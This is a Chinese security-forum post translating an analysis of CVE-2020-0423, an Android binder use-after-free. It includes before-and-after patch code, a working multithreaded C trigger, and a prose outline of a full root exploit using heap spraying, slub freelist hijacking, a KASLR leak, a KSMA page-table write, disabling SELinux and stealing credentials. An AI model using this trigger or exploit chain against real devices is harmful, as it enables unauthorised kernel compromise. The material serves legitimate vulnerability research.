首页
社区
课程
招聘
[翻译]CVE-2020-0423 android内核提权漏洞分析
发表于: 2020-12-25 14:44 21289

[翻译]CVE-2020-0423 android内核提权漏洞分析

2020-12-25 14:44
21289

2020年10月公布了bulletin,这是最近新的提权漏洞,存在于binder中。
这个漏洞大致上是binder的sender和receive端的对binder_node结构体的race condition转化为uaf漏洞,作者进一步触发了double free,结合后续巧妙的堆喷分配,利用slub和ksma机制,绕过kalsr和cfi保护,官方给出影响的版本在Android 8-11之间,详细的英文文章请参考这里https://blog.longterm.io/cve-2020-0423.html

其poc触发形式为:
Thread 1: enter binder_release_work from binder_thread_release
Thread 2: binder_update_ref_for_handle() -> binder_dec_node_ilocked()
Thread 2: dec nodeA --> 0 (will free node)
Thread 1: ACQ inner_proc_lock
Thread 2: block on inner_proc_lock
Thread 1: dequeue work (BINDER_WORK_NODE, part of nodeA)
Thread 1: REL inner_proc_lock
Thread 2: ACQ inner_proc_lock
Thread 2: todo list cleanup, but work was already dequeued
Thread 2: free node
Thread 2: REL inner_proc_lock
Thread 1: deref w->type (UAF)
分开来看的话,
Thread 1: enter binder_release_work from binder_thread_release
Thread 1: ACQ inner_proc_lock 获取锁
Thread 1: dequeue work (BINDER_WORK_NODE, part of nodeA) 从链表中摘除binder_work
Thread 1: REL inner_proc_lock 释放锁
Thread 1: deref w->type (UAF) 引用binder_work->type

再来看Thread 2
Thread 2: binder_update_ref_for_handle() -> binder_dec_node_ilocked()
Thread 2: dec nodeA --> 0 (will free node)
Thread 2: block on inner_proc_lock 等待锁被thread释放
Thread 2: ACQ inner_proc_lock 获取锁
Thread 2: todo list cleanup, but work was already dequeued 清空链表
Thread 2: free node 释放binder_node
Thread 2: REL inner_proc_lock 释放锁

可以看到binder_work拿到之后, 但是另一个线程紧接这free掉了它,但后续还直接使用它,造成了uaf。
binder_work又是binder_node的成员

通过patch前后的对比,主要增大了binder_inner_proc_lock(proc);锁的范围。所以这个漏洞也可以说是开发时没有考虑到锁的范围导致的。

poc可以分为三个阶段触发:

所以poc为

作者在Pixel 4设备上Android 10 factory image QQ3A.200805.001 released in August 2020做了尝试。

结合poc来分析为何这样写:

这时候通过binder_ioctl调用binder_thread_release——>binder_release_work(proc, &thread->todo); 从而走到以下这里

引用4

当sender线程传送的内容里包括BINDER_TYPE_BINDER或者BINDER_TYPE_WEAK_BINDER,binder_node结构体将会创建,接收端的线程同时会有一个引用(如果这个引用变为0,将会释放binder_node)
这时候会调用binder_translate_binder,最终会走到以下代码,可以看到node->work会进入队列thread->todo链表中。

引用3

当binder收到BC_FREE_BUFFER指令时就会调用binder_free_node函数。

引用2

注意到也许不用显示的调用BC_FREE_BUFFER时,当binder service一次的transaction的完成时,就会自动用BC_FREE_BUFFER释放发送端的binder_node结构体, 当然也可以寻找ITokenManager service这样的一个服务,充当一个中介,这里面的原理就是有时候不能控制service端,就比如media这样的服务,你无法控制它,毕竟是一个系统service,但是ITokenManager可以让我们既可以控制service端又可以控制client端,如果水滴漏洞采用这样的方式,是不是效率会更高一些。
所以对与binder_node的释放,其实是BC_FREE_BUFFER指令来进行,有的service接收端是自动发送的。
binder_parse函数中,当回复一个transacton时,service manager要么会call binder_free_buffer,如果是单向(one-way)的transaction,就会调用binder_send_reply

在两种情况下,servicemanager最后都会回复一个BC_FREE_BUFFER,其内核调用流程为

分析好了poc,从而得到内核crash

poc不是难以理解,但exploit我感觉还是挺巧妙的,首先是uaf的漏洞,还是要堆喷, binder_node是128字节大小的cache,这里采用sendmsg和signalfd来做稳定的堆喷, 第一是sendmsg喷完就会马上释放,而在google这篇文章提到signalfd() reallocates the 128-byte heap chunk as an 8-byte allocation and leaves the rest of it uninitialized, signalfd会重新申请128字节大小,这个内容就是刚刚sendmsg释放的,这样就能保证sendmsg的内容能很好的驻留在堆中,signalfd除了用到的几个字段几乎不会改变sendmsg的内容。堆喷可以写成:

堆喷完成,被释放的binder_work显然是用户态通过sendmsg填充的内容,内核代码流程就会继续往下执行:w就是可以是我们喷射的内容,就可以被我们控制,走向任何分支。

总结一下,无论走到任何一个分支,以上代码都会再次free,就会形成doubule free,如果达到最后的kfree,被控制的binder_node里面的字段需要满足一定的条件。但是不同分支会free的位置不一样,
走到BINDER_WORK_TRANSACTION_COMPLETE,就会free+8的位置。
1.到了分支BINDER_WORK_TRANSACTION will free X
2.BINDER_WORK_TRANSACTION_COMPLETE, BINDER_WORK_DEAD_BINDER_AND_CLEAR and BINDER_WORK_CLEAR_DEATH_NOTIFICATION will free X+8
当选择1时 BINDER_WORK_TRANSACTION,会走入binder_cleanup_transaction函数

关键的一点是double free会导致再次申请的两个objec会发生重叠,这是利用的核心,而且如果达到root最新的手机,必须绕过kalsr保护和cfi保护。

核心思想是,既然再次申请的两个object发生重叠,一个包含函数指针,一个能触发读,是不是就可以绕过呢。
signalfd系统调用可以分配128字节的堆cache,它的主要功能是:

通过以上理解,读代码时就简单了

KSMA简单的理解就是向内核页表中写入一项描述符,就可以做到用户态可以随意读写内核了,甚至代码段,拿到root岂不是轻而易举了。
引用一张图就是

引用5
这里就不细讲了,如果想理解的话,请参考以上pdf。总之我们想让一个内核地址写入一个描述符,应该怎么利用呢。

利用了内核的堆分配机制slub, slub中有一个字段叫做freelist指针,它指向最新被free的对象。
而第一个对象的首8个字节,会指向第二个被free的对象,以次类推。
当kmalloc分配时, 将会从freelist指向的object取,并且读取这个object的前8个字节赋给新的freelist。
当kfree时,slub会写当前的freelist指针写入到正在被free的object首地址处,并且更新freelist指针指向这个新的被free掉的object。

引用6

以上图可以看到kfree(0x1180)后,freelist=0x1180,0x1180的前8个字节=0
kfree(0x1100)后,freelist = 0x1100, 0x1100位置处的前8个字节=0x1180,以此类推。

引用7
以上图可以看到kmalloc(0x1000), freelist从0x1000变为0x1100
下一次分配,kmalloc(0x1100)时,freelist取出0x1100的前8个字节的地址变为0x1180,所以从0x1100变为0x1180.

通过此,利用就有了新思路:
1.当double free发生时,再次申请两次会发生重叠。这时候第一次的被free掉,第二次用signalfd函数对喷,并且通过用户态修改前8个字节,就修改了第一次被free掉的object的指针,再几次分配时freelist指针就会从用户态指定的地址去分配了,前提是保证free掉的object必须还在对应的内核虚拟位置。

如果修改slab中的freelist的位置的值,就会分配对象在我们想要的位置:
引用8
当修改0x1100位置的前8个字节为0xDEADBEEF时,等分配到kmalloc(0x80)时,freelist=0xDEADBEEF,再次分配就会分配到0xDEADBEEF,这个地址。
引用9
通过修改free对象的freelist位置的地址,就可以达到任意地址写入任意值的效果。

如果最终想实现swapper_pg_dir=*B5F00 = 0x00e8000080000751这样的效果,就能够任意patch内核。
但signalfd的限制就是再写入首8个字节处位8和位18总是被置位 即写入的总是b5xxx | 40100 = f5xxx =0x00e8000080000751
为了解决这个问题,作者在内核中找到了ipa_testbus_mem缓冲区,大小为0x198000,并且缓冲区为0。

2.堆喷一次signalfd,然后触发free,通过write调用修改freelist为ipa_testbus_mem | 0x40100, 下一次分配的为地址ipa_testbus_mem | 0x40100,
再通过堆喷eventfd(0, EFD_NONBLOCK)和sendmsg结合,这样eventfd会block住sendmsg,不让堆内容进行释放。
从而eventfd_ctx结构体的地址=ipa_testbus_mem | 0x40100,同时eventfd_ctx+0x20(count的字段)可以被用户态通过write来修改。
就可以把B5F00地址写入count字段,就相当于写入到ipa_testbus_mem | 0x40100+0x20处,

3.这时候free所有的eventfd,并且重新利用free的signalfd设置freelist为ipa_testbus_mem | 0x40100 + 0x20,等再次signalfd分配就会分配到B5F00地址,这样通过write调用写入最终的block描述符了 0x00e8000080000751,即绕过了cfi。

1.关掉selinux
2.patch 这个函数sys_capset来替换成shellcode,
3.以及将init's credentials替换到本进程中即可完成提权。

本漏洞得多次利用race condition来实现每个重要的阶段,如控制w->type来进行double free,由于w是堆喷的对象,通过堆喷一次,再次触发free,形成double free, 接下来进入利用阶段,堆喷sendmsg signalfd,然后走入free分支, 再次堆喷seq_operations,调用read signal来实现读取seq_start的地址,绕过内核随机化保护, 然后又利用double free触发漏洞,结合ksma写入页表一个block描述符,修改freelist指针,由于signalfd的写入限制,所以加入了一个全局buffer作为跳板,再通过sendmsg和eventd的堆喷驻留,最后write写入其count字段,绕过cfi保护,后续的root部分就是常规操作了。

由于文章新出来没几天,也是自己对篇文章的理解,欢迎讨论和指点。

参考
https://blog.longterm.io/cve-2020-0423.html

KSMA: Breaking Android kernel isolation and Rooting with ARM MMU features - ThomasKing
https://i.blackhat.com/briefings/asia/2018/asia-18-WANG-KSMA-Breaking-Android-kernel-isolation-and-Rooting-with-ARM-MMU-features.pdf

Mitigations are attack surface, too - Project Zero
https://googleprojectzero.blogspot.com/2020/02/mitigations-are-attack-surface-too.html

Exploiting CVE-2020-0041: Escaping the Chrome Sandbox - Blue Frost Security
Part 1: https://labs.bluefrostsecurity.de/blog/2020/03/31/cve-2020-0041-part-1-sandbox-escape/
Part 2: https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/

 
 
struct binder_node {
    int debug_id;
    spinlock_t lock;
    struct binder_work work; //binder_work
    union {
        struct rb_node rb_node;
        struct hlist_node dead_node;
    };
struct binder_node {
    int debug_id;
    spinlock_t lock;
    struct binder_work work; //binder_work
    union {
        struct rb_node rb_node;
        struct hlist_node dead_node;
    };
// Before the patch
 
static struct binder_work *binder_dequeue_work_head(
                    struct binder_proc *proc,
                    struct list_head *list)
{
    struct binder_work *w;
 
    binder_inner_proc_lock(proc);
    w = binder_dequeue_work_head_ilocked(list);
    binder_inner_proc_unlock(proc);
    return w;
}
 
static void binder_release_work(struct binder_proc *proc,
                struct list_head *list)
{
    struct binder_work *w;
 
    while (1) {
        w = binder_dequeue_work_head(proc, list);
        /*
         * From this point on, there is no lock on `proc` anymore
         * which means `w` could have been freed in another thread and
         * therefore be pointing to dangling memory.
         */
        if (!w)
            return;
 
        switch (w->type) { /* <--- Use-after-free occurs here */
 
// [...]
// After the patch
patch后
static void binder_release_work(struct binder_proc *proc,
                struct list_head *list)
{
    struct binder_work *w;
    enum binder_work_type wtype;
 
    while (1) {
        binder_inner_proc_lock(proc);
        /*
         * Since the lock on `proc` is held while calling
         * `binder_dequeue_work_head_ilocked` and reading the `type` field of
         * the resulting `binder_work` stuct, we can be sure its value has not
         * been tampered with.
         */
        w = binder_dequeue_work_head_ilocked(list); //这里的对binder_work->w加了锁。
        wtype = w ? w->type : 0;
        binder_inner_proc_unlock(proc);
        if (!w)
            return;
 
        switch (wtype) { /* <--- Use-after-free not possible anymore */
 
// [...]
// Before the patch
 
static struct binder_work *binder_dequeue_work_head(
                    struct binder_proc *proc,
                    struct list_head *list)
{
    struct binder_work *w;
 
    binder_inner_proc_lock(proc);
    w = binder_dequeue_work_head_ilocked(list);
    binder_inner_proc_unlock(proc);
    return w;
}
 
static void binder_release_work(struct binder_proc *proc,
                struct list_head *list)
{
    struct binder_work *w;
 
    while (1) {
        w = binder_dequeue_work_head(proc, list);
        /*
         * From this point on, there is no lock on `proc` anymore
         * which means `w` could have been freed in another thread and
         * therefore be pointing to dangling memory.
         */
        if (!w)
            return;
 
        switch (w->type) { /* <--- Use-after-free occurs here */
 
// [...]
// After the patch
patch后
static void binder_release_work(struct binder_proc *proc,
                struct list_head *list)
{
    struct binder_work *w;
    enum binder_work_type wtype;
 
    while (1) {
        binder_inner_proc_lock(proc);
        /*
         * Since the lock on `proc` is held while calling
         * `binder_dequeue_work_head_ilocked` and reading the `type` field of
         * the resulting `binder_work` stuct, we can be sure its value has not
         * been tampered with.
         */
        w = binder_dequeue_work_head_ilocked(list); //这里的对binder_work->w加了锁。
        wtype = w ? w->type : 0;
        binder_inner_proc_unlock(proc);
        if (!w)
            return;
 
        switch (wtype) { /* <--- Use-after-free not possible anymore */
 
// [...]
/*
 * Generates a binder transaction able to trigger the bug
 */
static inline void init_binder_transaction(int nb) {
    /*
     * Writes `nb` times a BINDER_TYPE_BINDER object in the object buffer
     * and updates the offsets in the offset buffer accordingly
     */
    for (int i = 0; i < nb; i++) {
        struct flat_binder_object *fbo =
            (struct flat_binder_object *)((void*)(MEM_ADDR + 0x400LL + i*sizeof(*fbo)));
        fbo->hdr.type = BINDER_TYPE_BINDER;//这时候会创建binder_node
        fbo->binder = i;
        fbo->cookie = i;
        uint64_t *offset = (uint64_t *)((void *)(MEM_ADDR + OFFSETS_START + 8LL*i));
        *offset = i * sizeof(*fbo);
    }
 
    /*
     * Binder transaction data referencing the offset and object buffers
     */
    struct binder_transaction_data btd2 = {
        .flags = TF_ONE_WAY, /* we don't need a reply */
        .data_size = 0x28 * nb,
        .offsets_size = 8 * nb,
        .data.ptr.buffer = MEM_ADDR  + 0x400,
        .data.ptr.offsets = MEM_ADDR + OFFSETS_START,
    };
 
    uint64_t txn_size = sizeof(uint32_t) + sizeof(btd2);
 
    /* Transaction command */
    *(uint32_t*)(MEM_ADDR + 0x200) = BC_TRANSACTION;
    memcpy((void*)(MEM_ADDR + 0x204), &btd2, sizeof(btd2));
 
    /* Binder write/read structure sent to binder */
    struct binder_write_read bwr = {
        .write_size = txn_size * (1), // 1 txno
        .write_buffer = MEM_ADDR + 0x200
    };
    memcpy((void*)(MEM_ADDR + 0x100), &bwr, sizeof(bwr));
}
void *trigger_thread_func(void *argp) {
    unsigned long id = (unsigned long)argp;
    int ret = 0;
    int binder_fd = -1;
    int binder_fd_copy = -1;
 
    // Opening binder device
    binder_fd = open("/dev/binder", O_RDWR);
    if (binder_fd < 0)
        perror("An error occured while opening binder");
 
    for (;;) {
        // Refill the memory region with the transaction
        init_binder_transaction(1);
        // Copying the binder fd
        binder_fd_copy = dup(binder_fd);
        // Sending the transaction
        ret = ioctl(binder_fd_copy, BINDER_WRITE_READ, MEM_ADDR + 0x100); //创建binder_node
        if (ret != 0)
            debug_printf("BINDER_WRITE_READ did not work: %d", ret);
        // Binder thread exit
        ret = ioctl(binder_fd_copy, BINDER_THREAD_EXIT, 0);//从thread->todolist中出列,当返回之时,binder_node也会释放。
        if (ret != 0)
            debug_printf("BINDER_WRITE_EXIT did not work: %d", ret);
        // Closing binder device
        close(binder_fd_copy);
    }
 
    return NULL;
}
int main() {
    pthread_t trigger_threads[NB_TRIGGER_THREADS];
 
    // Memory region for binder transactions
    mmap((void*)MEM_ADDR, MEM_SIZE, PROT_READ | PROT_WRITE,
         MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
 
    // Init random
    srand(time(0));
 
    // Get rid of stdout/stderr buffering
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
 
    // Starting trigger threads
    debug_print("Starting trigger threads");
    for (unsigned long i = 0; i < NB_TRIGGER_THREADS; i++) {
        pthread_create(&trigger_threads[i], NULL, trigger_thread_func, (void*)i);//多线程来触发。
    }
    // Waiting for trigger threads
    for (int i = 0; i < NB_TRIGGER_THREADS; i++)
        pthread_join(trigger_threads[i], NULL);
 
    return 0;
}
/*
 * Generates a binder transaction able to trigger the bug
 */
static inline void init_binder_transaction(int nb) {
    /*
     * Writes `nb` times a BINDER_TYPE_BINDER object in the object buffer
     * and updates the offsets in the offset buffer accordingly
     */
    for (int i = 0; i < nb; i++) {
        struct flat_binder_object *fbo =
            (struct flat_binder_object *)((void*)(MEM_ADDR + 0x400LL + i*sizeof(*fbo)));
        fbo->hdr.type = BINDER_TYPE_BINDER;//这时候会创建binder_node
        fbo->binder = i;
        fbo->cookie = i;
        uint64_t *offset = (uint64_t *)((void *)(MEM_ADDR + OFFSETS_START + 8LL*i));
        *offset = i * sizeof(*fbo);
    }
 
    /*
     * Binder transaction data referencing the offset and object buffers
     */
    struct binder_transaction_data btd2 = {
        .flags = TF_ONE_WAY, /* we don't need a reply */
        .data_size = 0x28 * nb,
        .offsets_size = 8 * nb,
        .data.ptr.buffer = MEM_ADDR  + 0x400,
        .data.ptr.offsets = MEM_ADDR + OFFSETS_START,
    };
 
    uint64_t txn_size = sizeof(uint32_t) + sizeof(btd2);
 
    /* Transaction command */
    *(uint32_t*)(MEM_ADDR + 0x200) = BC_TRANSACTION;
    memcpy((void*)(MEM_ADDR + 0x204), &btd2, sizeof(btd2));
 
    /* Binder write/read structure sent to binder */
    struct binder_write_read bwr = {
        .write_size = txn_size * (1), // 1 txno
        .write_buffer = MEM_ADDR + 0x200
    };
    memcpy((void*)(MEM_ADDR + 0x100), &bwr, sizeof(bwr));
}
void *trigger_thread_func(void *argp) {
    unsigned long id = (unsigned long)argp;
    int ret = 0;
    int binder_fd = -1;
    int binder_fd_copy = -1;
 
    // Opening binder device
    binder_fd = open("/dev/binder", O_RDWR);
    if (binder_fd < 0)
        perror("An error occured while opening binder");
 
    for (;;) {
        // Refill the memory region with the transaction
        init_binder_transaction(1);
        // Copying the binder fd
        binder_fd_copy = dup(binder_fd);
        // Sending the transaction
        ret = ioctl(binder_fd_copy, BINDER_WRITE_READ, MEM_ADDR + 0x100); //创建binder_node
        if (ret != 0)
            debug_printf("BINDER_WRITE_READ did not work: %d", ret);
        // Binder thread exit
        ret = ioctl(binder_fd_copy, BINDER_THREAD_EXIT, 0);//从thread->todolist中出列,当返回之时,binder_node也会释放。
        if (ret != 0)
            debug_printf("BINDER_WRITE_EXIT did not work: %d", ret);
        // Closing binder device
        close(binder_fd_copy);
    }
 
    return NULL;
}
int main() {
    pthread_t trigger_threads[NB_TRIGGER_THREADS];
 
    // Memory region for binder transactions
    mmap((void*)MEM_ADDR, MEM_SIZE, PROT_READ | PROT_WRITE,
         MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
 
    // Init random
    srand(time(0));
 
    // Get rid of stdout/stderr buffering
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
 
    // Starting trigger threads
    debug_print("Starting trigger threads");
    for (unsigned long i = 0; i < NB_TRIGGER_THREADS; i++) {
        pthread_create(&trigger_threads[i], NULL, trigger_thread_func, (void*)i);//多线程来触发。
    }
    // Waiting for trigger threads
    for (int i = 0; i < NB_TRIGGER_THREADS; i++)
        pthread_join(trigger_threads[i], NULL);
 
    return 0;
}
// Userland code from the exploit
int binder_fd = open("/dev/binder", O_RDWR);
ioctl(binder_fd, BINDER_THREAD_EXIT, 0)
// Userland code from the exploit
int binder_fd = open("/dev/binder", O_RDWR);
ioctl(binder_fd, BINDER_THREAD_EXIT, 0)
static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    // [...]
 
    case BINDER_THREAD_EXIT:
        binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
                    proc->pid, thread->pid);
        binder_thread_release(proc, thread);
        thread = NULL;
        break;
 
    // [...]
static int binder_thread_release(struct binder_proc *proc,
                 struct binder_thread *thread)
{
    // [...]
 
    binder_release_work(proc, &thread->todo);
    binder_thread_dec_tmpref(thread);
    return active_transactions;
}
 
static void binder_release_work(struct binder_proc *proc,
                struct list_head *list)
{
    struct binder_work *w;
 
    while (1) {
        w = binder_dequeue_work_head(proc, list); /* dequeues from thread->todo */
        if (!w)
            return;
 
    // [...]
static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    // [...]
 
    case BINDER_THREAD_EXIT:
        binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
                    proc->pid, thread->pid);
        binder_thread_release(proc, thread);
        thread = NULL;
        break;
 
    // [...]
static int binder_thread_release(struct binder_proc *proc,
                 struct binder_thread *thread)
{
    // [...]
 
    binder_release_work(proc, &thread->todo);
    binder_thread_dec_tmpref(thread);
    return active_transactions;
}
 
static void binder_release_work(struct binder_proc *proc,
                struct list_head *list)
{
    struct binder_work *w;
 
    while (1) {
        w = binder_dequeue_work_head(proc, list); /* dequeues from thread->todo */
        if (!w)
            return;
 
    // [...]
static int binder_translate_binder(struct flat_binder_object *fp,
                   struct binder_transaction *t,
                   struct binder_thread *thread)
{
    // [...]
    ret = binder_inc_ref_for_node(target_proc, node,
            fp->hdr.type == BINDER_TYPE_BINDER,
            &thread->todo, &rdata);
    // [...]
}
static int binder_inc_ref_for_node(struct binder_proc *proc,
            struct binder_node *node,
            bool strong,
            struct list_head *target_list,
            struct binder_ref_data *rdata)
{
    // [...]
    ret = binder_inc_ref_olocked(ref, strong, target_list);
    // [...]
}
static int binder_inc_node_nilocked(struct binder_node *node, int strong,
                    int internal,
                    struct list_head *target_list)
{
    // [...]
    if (strong) {
        // [...]
        if (!node->has_strong_ref && target_list) {
            // [...]
            binder_enqueue_deferred_thread_work_ilocked(thread,
                                   &node->work); //当对这个node节点是强引用时
        }
    } else {
        // [...]
        if (!node->has_weak_ref && list_empty(&node->work.entry)) {
            // [...]
            binder_enqueue_work_ilocked(&node->work, target_list);//当是弱引用时。
        }
    }
    return 0;
}
static int binder_translate_binder(struct flat_binder_object *fp,
                   struct binder_transaction *t,
                   struct binder_thread *thread)
{
    // [...]
    ret = binder_inc_ref_for_node(target_proc, node,
            fp->hdr.type == BINDER_TYPE_BINDER,
            &thread->todo, &rdata);
    // [...]
}
static int binder_inc_ref_for_node(struct binder_proc *proc,
            struct binder_node *node,
            bool strong,
            struct list_head *target_list,
            struct binder_ref_data *rdata)
{
    // [...]
    ret = binder_inc_ref_olocked(ref, strong, target_list);
    // [...]
}
static int binder_inc_node_nilocked(struct binder_node *node, int strong,
                    int internal,
                    struct list_head *target_list)
{
    // [...]
    if (strong) {
        // [...]
        if (!node->has_strong_ref && target_list) {
            // [...]
            binder_enqueue_deferred_thread_work_ilocked(thread,
                                   &node->work); //当对这个node节点是强引用时
        }
    } else {
        // [...]
        if (!node->has_weak_ref && list_empty(&node->work.entry)) {
            // [...]
            binder_enqueue_work_ilocked(&node->work, target_list);//当是弱引用时。
        }
    }
    return 0;
}
static void binder_free_node(struct binder_node *node)
{
    kfree(node);
    binder_stats_deleted(BINDER_STAT_NODE);
}
static void binder_free_node(struct binder_node *node)
{
    kfree(node);
    binder_stats_deleted(BINDER_STAT_NODE);
}
 
int binder_parse(struct binder_state *bs, struct binder_io *bio,
                 uintptr_t ptr, size_t size, binder_handler func)
{
        // [...]
        switch(cmd) {
        // [...]
        case BR_TRANSACTION_SEC_CTX:
        case BR_TRANSACTION: {
            // [...]
            if (func) {
                // [...]
                if (txn.transaction_data.flags & TF_ONE_WAY) {
                    binder_free_buffer(bs, txn.transaction_data.data.ptr.buffer);
                } else {
                    binder_send_reply(bs, &reply, txn.transaction_data.data.ptr.buffer, res);
                }
            }
            break;
        }
        // [...]
int binder_parse(struct binder_state *bs, struct binder_io *bio,
                 uintptr_t ptr, size_t size, binder_handler func)
{
        // [...]
        switch(cmd) {
        // [...]
        case BR_TRANSACTION_SEC_CTX:
        case BR_TRANSACTION: {
            // [...]
            if (func) {
                // [...]
                if (txn.transaction_data.flags & TF_ONE_WAY) {
                    binder_free_buffer(bs, txn.transaction_data.data.ptr.buffer);
                } else {
                    binder_send_reply(bs, &reply, txn.transaction_data.data.ptr.buffer, res);
                }
            }
            break;
        }
        // [...]
static int binder_thread_write(struct binder_proc *proc,
            struct binder_thread *thread,
            binder_uintptr_t binder_buffer, size_t size,
            binder_size_t *consumed)
{
        // [...]
        case BC_FREE_BUFFER: {
            // [...]
            binder_transaction_buffer_release(proc, buffer, 0, false);
            // [...]
        }
        // [...]
static void binder_transaction_buffer_release(struct binder_proc *proc,
                          struct binder_buffer *buffer,
                          binder_size_t failed_at,
                          bool is_failure)
{
        // [...]
        switch (hdr->type) {
        // [...]
        case BINDER_TYPE_HANDLE:
        case BINDER_TYPE_WEAK_HANDLE: {
            struct flat_binder_object *fp;
            struct binder_ref_data rdata;
            int ret;
            fp = to_flat_binder_object(hdr);
            ret = binder_dec_ref_for_handle(proc, fp->handle,
                hdr->type == BINDER_TYPE_HANDLE, &rdata);
            // [...]
        } break;
        // [...]
 static int binder_update_ref_for_handle(struct binder_proc *proc,
        uint32_t desc, bool increment, bool strong,
        struct binder_ref_data *rdata)
{
    // [...]
    if (increment)
        ret = binder_inc_ref_olocked(ref, strong, NULL);
    else
        /*
         * Decrements the reference count by one and returns true since it
         * dropped to zero
         */
        delete_ref = binder_dec_ref_olocked(ref, strong);
    // [...]
    /* delete_ref is true, the binder node is freed */
    if (delete_ref)
        binder_free_ref(ref);
    return ret;
    // [...]
}
static void binder_free_ref(struct binder_ref *ref)
{
    if (ref->node)
        binder_free_node(ref->node);
    kfree(ref->death);
    kfree(ref);
}
static int binder_thread_write(struct binder_proc *proc,
            struct binder_thread *thread,
            binder_uintptr_t binder_buffer, size_t size,
            binder_size_t *consumed)
{
        // [...]
        case BC_FREE_BUFFER: {
            // [...]
            binder_transaction_buffer_release(proc, buffer, 0, false);
            // [...]
        }
        // [...]
static void binder_transaction_buffer_release(struct binder_proc *proc,
                          struct binder_buffer *buffer,
                          binder_size_t failed_at,
                          bool is_failure)
{
        // [...]
        switch (hdr->type) {
        // [...]
        case BINDER_TYPE_HANDLE:
        case BINDER_TYPE_WEAK_HANDLE: {
            struct flat_binder_object *fp;
            struct binder_ref_data rdata;
            int ret;
            fp = to_flat_binder_object(hdr);
            ret = binder_dec_ref_for_handle(proc, fp->handle,
                hdr->type == BINDER_TYPE_HANDLE, &rdata);
            // [...]
        } break;
        // [...]
 static int binder_update_ref_for_handle(struct binder_proc *proc,
        uint32_t desc, bool increment, bool strong,
        struct binder_ref_data *rdata)
{
    // [...]
    if (increment)
        ret = binder_inc_ref_olocked(ref, strong, NULL);
    else
        /*
         * Decrements the reference count by one and returns true since it
         * dropped to zero

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2022-10-3 00:33 被LowRebSwrd编辑 ,原因:
收藏
免费 12
支持
分享
最新回复 (16)
雪    币: 1
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
好活 好活
2020-12-25 15:17
0
雪    币: 5203
活跃值: (3275)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
感谢,我的索尼有办法root了
2020-12-25 19:50
0
雪    币: 4168
活跃值: (15932)
能力值: ( LV9,RANK:710 )
在线值:
发帖
回帖
粉丝
4
感谢分享
2020-12-26 08:38
0
雪    币: 14492
活跃值: (17493)
能力值: ( LV12,RANK:290 )
在线值:
发帖
回帖
粉丝
5
感谢分享
2020-12-26 10:51
0
雪    币: 477
活跃值: (1412)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
湿求了鸭 感谢,我的索尼有办法root了[em_63]
成功了么
2020-12-26 11:25
0
雪    币: 199
活跃值: (926)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
牛皮
2020-12-26 18:19
0
雪    币: 7818
活跃值: (1073)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
8
赞赞赞。
2020-12-27 10:02
0
雪    币: 2089
活跃值: (3933)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
不错,跟我以前利用的内核提权相似
2020-12-27 18:38
0
雪    币: 593
活跃值: (817)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
10
厉害啊,这么快
2021-1-4 14:06
0
雪    币: 26399
活跃值: (63262)
能力值: (RANK:135 )
在线值:
发帖
回帖
粉丝
11
顶~
2021-1-4 17:11
0
雪    币:
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
12
https://www.longterm.io/cve-2020-0423.html
这才是原文
2021-2-1 09:47
0
雪    币: 207
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
13
想问一下spray_thread_data结构体是怎么定义的吗,求解答
2021-2-7 09:54
0
雪    币: 2089
活跃值: (3933)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
文章写得略显复杂,原理就是两次释放一个虚拟内存地址,实际上并不是同一个物理地址。剩下的就不必多说了,但是利用这个原理,我发现好像没法提权我的安卓设备,可能是哪里利用的不对吧。。。卡在写入Descriptor无效上了
2021-2-15 15:42
0
雪    币: 0
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
15
2021-4-16 16:57
0
雪    币: 949
活跃值: (119)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
16
翻译的不说明还精华???
2021-11-26 14:36
0
雪    币: 6573
活跃值: (3873)
能力值: (RANK:200 )
在线值:
发帖
回帖
粉丝
17
starbuck 翻译的不说明还精华???
看简介的地方,确实写的翻译
2021-12-8 10:40
0
游客
登录 | 注册 方可回帖
返回
//